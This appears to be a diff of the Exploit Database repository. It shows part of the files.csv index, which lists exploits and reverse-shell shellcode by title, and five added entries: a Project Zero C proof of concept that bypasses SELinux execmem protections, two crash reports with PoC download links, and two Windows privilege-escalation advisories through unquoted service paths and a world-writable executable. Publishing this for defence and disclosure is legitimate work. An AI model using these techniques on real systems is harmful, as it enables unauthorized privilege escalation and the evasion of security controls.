38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
@ -35781,7 +35786,7 @@ id,file,description,date,author,platform,type,port
39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos,0
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39478,platforms/php/webapps/39478.txt,"SOLIDserver <= 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
@ -35851,7 +35856,7 @@ id,file,description,date,author,platform,type,port
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
@ -36000,7 +36005,7 @@ id,file,description,date,author,platform,type,port
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0
@ -36086,7 +36091,7 @@ id,file,description,date,author,platform,type,port
39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
@ -36342,7 +36347,7 @@ id,file,description,date,author,platform,type,port
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0

Can't render this file because it is too large.

47
platforms/linux/dos/40419.c Executable file
View file

@ -0,0 +1,47 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=854
SELinux has a set of permissions that can be used to prevent processes from creating executable
memory mappings that contain data controlled by the process (PROCESS__EXECMEM, PROCESS__EXECHEAP, ...).
These permissions, when applied correctly, make exploitation of memory corruption issues somewhat more
difficult and much more annoying.
When a process tries to map memory using sys_mmap_pgoff(), vm_mmap_pgoff() is called, which first
performs the LSM security check by calling security_mmap_file() and then calls do_mmap_pgoff(), which
takes care of the rest and does not rerun the same security check.
The syscall handler for io_setup() calls ioctx_alloc(), which calls aio_setup_ring(), which allocates
memory via do_mmap_pgoff() - the method that doesn't contain the security check.
aio_setup_ring() only requests that the memory is mapped as PROT_READ | PROT_WRITE; however, if the
process has called personality(READ_IMPLIES_EXEC) before, this will actually result in the creation
of a memory mapping that is both writable and executable, bypassing the SELinux restriction.
To verify: (note: I actually tested this without SELinux since the code looks pretty straightforward
and I don't want to figure out how to set up SELinux rules)
$ cat > iosetup.c
*/
#define _GNU_SOURCE
#include <linux/aio_abi.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <err.h>
#include <sys/personality.h>
int main(void) {
aio_context_t ctx;
personality(READ_IMPLIES_EXEC);
if (syscall(__NR_io_setup, 1, &ctx))
err(1, "io_setup");
while (1) pause();
}
/*
$ gcc -o iosetup iosetup.c
$ ./iosetup &
[1] 4949
$ cat /proc/4949/maps | grep aio
7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330 /[aio] (deleted)
*/

9
platforms/multiple/dos/40420.txt Executable file
View file

@ -0,0 +1,9 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=857
The attached fuzz file causes memory corruption when decompressing embedded video content.
Fixed in the September update
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40420.zip

9
platforms/multiple/dos/40421.txt Executable file
View file

@ -0,0 +1,9 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=859
There is a crash when the AVC decoder attempts to free memory, likely indicating memory corruption.
Fixed in the September update
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40421.zip

60
platforms/windows/local/40417.txt Executable file
View file

@ -0,0 +1,60 @@
# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.wisecleaner.com
# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
# Tested on: Windows 7 x86
# Shout-out to carbonated and ozzie_offsec
1. Description:
Two seperate instances of unquoted service path privilege escalation has been discovered. The first instance is within Wise Care 365 4.27 which installs a vulnerable service entitled WiseBootAssistant. The second vulnerability exists when Wise Disk Cleaner 9.29 installs SpyHunter 4. Both of these services run with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
2. Proof
Wise Disk Cleaner 9.29
C:\>sc qc WiseBootAssistant
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WiseBootAssistant
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Wise\Wise Care 365\BootTime.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wise Boot Assistant
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
SpyHunter 4
C:\>sc qc "SpyHunter 4 Service"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyHunter 4 Service
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
LOAD_ORDER_GROUP : Base
TAG : 0
DISPLAY_NAME : SpyHunter 4 Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
3. Exploit:
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

28
platforms/windows/local/40418.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
# Date: 23/09/2016
# Exploit Author: Tulpa
# Contact: tulpa@tulpa-security.com
# Author website: www.tulpa-security.com
# Vendor Homepage: http://www.zortam.com/
# Software Link: http://www.zortam.com/download.html
# Version: Software Version 21.15
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
# Shout-out to carbonated and ozzie_offsec
1. Description:
Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.
2. Proof
C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
BUILTIN\Users:(ID)R
3. Exploit:
Simply replace zmmspro.exe and wait for execution.